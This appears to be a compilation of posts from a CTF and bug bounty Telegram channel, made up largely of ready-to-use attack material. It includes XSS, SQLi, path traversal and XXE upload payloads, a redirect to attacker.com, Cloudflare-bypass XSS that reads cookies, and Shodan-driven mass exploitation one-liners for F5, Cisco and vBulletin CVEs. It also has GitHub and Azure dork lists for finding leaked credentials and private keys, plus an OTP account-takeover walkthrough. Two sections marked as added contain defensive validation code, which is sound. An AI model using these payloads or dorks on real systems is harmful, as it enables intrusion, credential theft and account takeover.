CTF | Bug Bounty

Join us for CTF resources, bug bounty resources, CTF challenges and more. Join now: https://t.me/ctftm
Owner: Team Matrix
DMCA/copyright claim: @Dmcatm
Admin contact: @Teammatrixs_bot

XSS Hunting from WaybackURLS
Payload: waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls-xss.txt | sort -u -o urls-xss.txt && cat urls-xss.txt | kxss
#bugbountytips #bugbounty
Chaining Vulnerabilities through File Upload
SQLi:
'sleep(20).jpg
sleep(25)-- -.jpg
Path traversal:
../../etc/passwd/logo.png
../../../logo.png
XSS:
->  Set file name filename="svg onload=alert(document.domain)>" , filename="58832_300x300.jpg<svg onload=confirm()>"

->  Upload using .gif file
GIF89a/<svg/onload=alert(1)>/=alert(document.domain)//;

-> Upload using .svg file
<svg xmlns="w3.org/2000/svg" onload="alert(1)"/>

-> <?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "w3.org/Graphics/SVG/1…"><svg version="1.1" baseProfile="full" xmlns="w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("HolyBugx XSS");
   </script>
</svg>
Open redirect:
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='attacker.com'"
xmlns="w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</svg>
</code>
XXE:
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="500px" height="500px" xmlns="w3.org/2000/svg" xmlns:xlink="w3.org/1999/xlink" version="1.1">
<text font-size="40" x="0" y="16">&xxe;</text>
</svg>
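A server-side check that rejects the upload patterns listed in this post, as an added example (not part of the original post). The function name, the filename allowlist and the rejection messages are assumptions; only the Python standard library is used.

```python
import re
import xml.etree.ElementTree as ET

# Allowlist for stored names: one stem without dots, one known extension.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.(?:png|jpg|jpeg|gif|svg)$", re.I)
# Raster magic bytes; a file claiming these extensions must start with them.
MAGIC = {"png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff",
         "jpeg": b"\xff\xd8\xff", "gif": b"GIF8"}
ACTIVE_TAGS = {"script", "foreignobject", "iframe", "object", "embed"}


def check_upload(filename: str, data: bytes) -> list[str]:
    """Return the reasons an upload is rejected (empty list = accepted)."""
    reasons = []
    if not SAFE_NAME.match(filename):
        # Catches quotes, spaces, '<', '/', '..' and double extensions.
        return ["filename not in allowlist"]
    ext = filename.rsplit(".", 1)[1].lower()
    if ext in MAGIC:
        if not data.startswith(MAGIC[ext]):
            reasons.append("magic bytes do not match extension")
        if re.search(rb"<\s*(svg|script|html)\b", data, re.I):
            reasons.append("markup inside raster image")
        return reasons
    # SVG: refuse any DTD so no entity (internal or external) is ever declared.
    if re.search(rb"<!\s*(DOCTYPE|ENTITY)", data, re.I):
        return ["DOCTYPE/ENTITY declaration in SVG"]
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return ["not well-formed XML"]
    for el in root.iter():
        tag = el.tag.rsplit("}", 1)[-1].lower()  # strip the XML namespace
        if tag in ACTIVE_TAGS:
            reasons.append(f"active element <{tag}>")
        for attr, value in el.attrib.items():
            name = attr.rsplit("}", 1)[-1].lower()
            if name.startswith("on"):
                reasons.append(f"event handler attribute {name}")
            elif name == "href" and value.strip().lower().startswith("javascript:"):
                reasons.append("script-capable href")
    return reasons


if __name__ == "__main__":
    # Constructed sample: an SVG carrying an event handler attribute.
    print(check_upload("logo.svg", b'<svg xmlns="http://www.w3.org/2000/svg" onload="x()"/>'))
```

Serving accepted uploads from a separate origin with `Content-Disposition: attachment` and a restrictive `Content-Security-Policy` covers anything a content filter like this misses.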
Github-Dork Happy Hunting
- api_key
- app_AWS_SECRET_ACCESS_KEY
- app_secret
- authorization
- Ldap
- aws_access_key_id
- secret
- bash_history
- bashrc%20password
- beanstalkd
- client secret
- composer
- config
- credentials
- DB_PASSWORD
- dotfiles
- .env file
- .exs file
- extension:json mongolab.com
- extension:pem%20private
- extension:ppk private
- extension:sql mysql dump
- extension:yaml mongolab.com
- .mlab.com password
- mysql
- npmrc%20_auth
- passwd
- passkey
- rds.amazonaws.com password
- s3cfg
- send_key
- token
- filename:.bash_history
- filename:.bash_profile aws
- filename:.bashrc mailchimp
- filename:CCCam.cfg
- filename:config irc_pass
- filename:config.php dbpasswd
- filename:config.json auths
- filename:config.php pass
- filename:connections.xml
- filename:.cshrc
- filename:.git-credentials
- filename:.ftpconfig
- filename:.history
- filename:gitlab-recovery-codes.txt
- filename:.htpasswd
- filename:id_rsa
- filename:.netrc password
- FTP
- filename:wp-config.php
- git-credentials
- github_token
- HEROKU_API_KEY language:json
- HEROKU_API_KEY language:shell
- GITHUB_API_TOKEN language:shell
- oauth
- OTP
- databases password
- [WFClient] Password= extension:ica
- xoxa_Jenkins
- security_credentials
#bugbountytips #GitHub
New Xss Fly Under Radar Cloudflare Bypass
Payload: "><input%252bTyPE%25253d"hxlxmj"%252bSTyLe%25253d"display%25253anone%25253b"%252bonfocus%25253d"this.style.display%25253d'block'%25253b%252bthis.onfocus%25253dnull%25253b"%252boNMoUseOVer%25253d"this['onmo'%25252b'useover']%25253dnull%25253beval(String.fromCharCode(99,111,110,102,105,114,109,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))%25253b"%252bAuToFOcus>
Credit - Halim
Awesome One-liner Bug Bounty:

> A collection of awesome one-liner scripts especially for bug bounty. This repository stores and houses various one-liner for bug bounty tips provided by me as well as contributed by the community. Your contributions and suggestions are heartily ♥ welcome.

## Definitions

This section defines specific terms or placeholders that are used throughout one-line command/scripts.

- 1.1. "HOST" defines one hostname, (sub)domain, or IP address, e.g. replaced by internal.host, domain.tld, sub.domain.tld, or 127.0.0.1.
- 1.2. "HOSTS.txt" contains criteria 1.1 with more than one in file.
- 2.1. "URL" definitely defines the URL, e.g. replaced by http://domain.tld/path/page.html or somewhat starting with HTTP/HTTPS protocol.
- 2.2. "URLS.txt" contains criteria 2.1 with more than one in file.
- 3.1. "FILE.txt" or "FILE{N}.txt" means the files needed to run the command/script according to its context and needs.
- 4.1. "OUT.txt" or "OUT{N}.txt" means the file as the target storage result will be the command that is executed.

---

### Local File Inclusion
> @dwisiswant0
gau HOST | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
### Open-redirect
> @dwisiswant0
export LHOST="URL"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
> @N3T_hunt3r
cat URLS.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk > /dev/null
### XSS
> @cihanmehmet
gospider -S URLS.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee OUT.txt
> @fanimalikhack
waybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt
> @oliverrickfors
cat HOSTS.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"
### Prototype Pollution
> @R0X4R
subfinder -d HOST -all -silent | httpx -silent -threads 300 | anew -q FILE.txt && sed 's/$/\/?__proto__[testparam]=exploit\//' FILE.txt | page-fetch -j 'window.testparam == "exploit"? "[VULNERABLE]" : "[NOT VULNERABLE]"' | sed "s/(//g" | sed "s/)//g" | sed "s/JS //g" | grep "VULNERABLE"
### CVE-2020-5902
> @Madrobot_
shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done
### CVE-2020-3452
> @vict0ni
while read LINE; do curl -s -k "https://$LINE/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" | head | grep -q "Cisco" && echo -e "[${GREEN}VULNERABLE${NC}] $LINE" || echo -e "[${RED}NOT VULNERABLE${NC}] $LINE"; done < HOSTS.txt
### CVE-2022-0378
> @7h3h4ckv157
cat URLS.txt | while read h do; do curl -sk "$h/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(1)+xx=%22test&from_url=x"|grep -qs "onmouse" && echo "$h: VULNERABLE"; done
### vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution
> @Madrobot_
shodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done;
### Find JavaScript Files
Tip: Extract IPs from a list of domains, and then you can conduct your fuzzing or manually check them for SDE/BAC, ports, etc.
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'
#BugBounty #bugbountytips
SQL Injection to Account Takeover Manually :)
1. Enter mobile number to login intercept
{"mobile_number":"8888888888"} >> 200
{"mobile_number":"8888888888'"} >> 500
{"mobile_number":"8888888888''"} >> 200
2. Final Query: 8888888888','1111','2024-04-03 21:20:55',1,'2024-04-03 21:20:55') --
2024-04-03 21:20:55 >> Exact time and date
1 >> attempts
you can see the 200 response
last you can login with the 1110 OTP and get access to the victim account :)
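The 200/500/200 quote behaviour from this post reproduced against a string-built INSERT, next to the parameterized form that removes it, as an added example (not part of the original post). The `otp` table layout, the function names and the use of SQLite are assumptions, since the post does not show the real schema or database.

```python
import re
import secrets
import sqlite3

NOW = "2024-04-03 21:20:55"  # fixed timestamp so the demo is repeatable


def new_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    # Assumed schema: the post does not show the real table.
    db.execute("CREATE TABLE otp (mobile TEXT, code TEXT, created_at TEXT,"
               " attempts INTEGER, updated_at TEXT)")
    return db


def request_otp_vulnerable(db, mobile: str) -> int:
    """String-built INSERT: a quote in the input changes the SQL itself."""
    code = f"{secrets.randbelow(10000):04d}"
    sql = f"INSERT INTO otp VALUES ('{mobile}','{code}','{NOW}',0,'{NOW}')"
    try:
        db.execute(sql)
        return 200
    except sqlite3.Error:
        return 500  # an unbalanced quote surfaces as a server error


def request_otp_safe(db, mobile: str) -> int:
    """Validate the format, then bind every value as a parameter."""
    if not re.fullmatch(r"\d{10}", mobile):
        return 400
    code = f"{secrets.randbelow(10000):04d}"
    db.execute("INSERT INTO otp VALUES (?,?,?,0,?)", (mobile, code, NOW, NOW))
    return 200


def stored_codes(db, mobile: str) -> list[str]:
    rows = db.execute("SELECT code FROM otp WHERE mobile = ?", (mobile,))
    return [r[0] for r in rows]


if __name__ == "__main__":
    db = new_db()
    # The three probes from the post, sent to both handlers.
    for probe in ("8888888888", "8888888888'", "8888888888''"):
        print(repr(probe), request_otp_vulnerable(db, probe), request_otp_safe(db, probe))
```

A 500 on one quote that turns back into a 200 on two quotes is also a useful detection signal in request logs for endpoints that should only ever receive digits.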
(Hard filter+Cloudflare bypassed) Stored XSS leads account takeover
Payload: xyz';"/></textarea><Img Src=OnXSS OnError=prompt(document.cookie)>
Tips: Always play with input's => reflecting value's tags, even if there is a WAF/Cloudflare.
#bugbountytip #bugbounty
Azure OSINT Google Dork List
- site:blob.core.windows.net “keyword”
- site:"blob.core.windows.net" and intext:"CONFIDENTIAL"
- site:*.core.windows.net intext:"TLP:RED"
- site:*.core.windows.net
- site:*.core.windows.net +blob
- site:*.core.windows.net +files -web -blob
- site:*.core.windows.net -web
- site:*.core.windows.net -web -blob -files
- site:*.core.windows.net inurl:dsts.dsts
- site:*.core.windows.net inurl:"term" -web
- site:*.blob.core.windows.net ext:xls | ext:xlsx (login | password | username)
- intext:connectionstring blob filetype:config
- intext:accountkey windows.net filetype:xml
- intext:storageaccountkey windows.net filetype:txt
Please Share Across Your Network, Someone Might Really Be Looking For This.
#Infosec #GHDB #Azure #bugbounty
New XSS Bypass Cloudflare WAF
Payload: %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E